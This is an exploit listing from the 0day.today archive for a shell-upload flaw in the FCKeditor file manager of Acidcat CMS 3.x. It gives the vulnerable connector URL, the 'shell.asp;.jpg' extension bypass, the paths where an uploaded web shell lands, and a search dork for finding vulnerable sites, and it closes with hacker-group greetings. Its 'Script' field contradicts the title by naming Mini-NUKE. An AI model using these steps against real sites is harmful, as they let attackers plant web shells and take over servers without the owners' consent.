Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability

2010-11-24T00:00:00
ID 1337DAY-ID-11500
Type zdt
Reporter Net.Edit0r
Modified 2010-11-24T00:00:00

Description

Exploit for asp platform in category web applications

                                        
                                            ========================================================
Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability
========================================================

    [»] Title   :           [ Acidcat CMS v 3.x (fckeditor) Shell Upload Vulnerability ]
  
    [»] Script  :           [ Mini-NUKE v2.3  ]
  
    [»] Language:           [ ASP ]
  
    [»] Download:           [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
  
    [»] Author  :           [ Net.Edit0r - [email protected] }
  
    [»] My Home :           [ ajaxtm.com and datacoders.org ]
  
    [»] Date    :           [ 2010-11-23 ]
   
    [»] Version :           [ 3.3.X and 3.2.x ]
 
    [»] Dork    :           [ "Powered by Acidcat CMS " ]
 
    
  
###########################################################################
  
     
===[ Exploit ]===
  
  
  [»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp
  
  [»] asp renamed via the .asp;.jpg (shell.asp;.jpg)
 
===[ Upload To ]===
 
  [»] http://server/read_write/file/[Shell]
 
  [»] http://server/public/File/[Shell]
 
 
Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1
 
     BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic  ~ keracker
                                   
  
###########################################################################



#  0day.today [2018-04-02]  #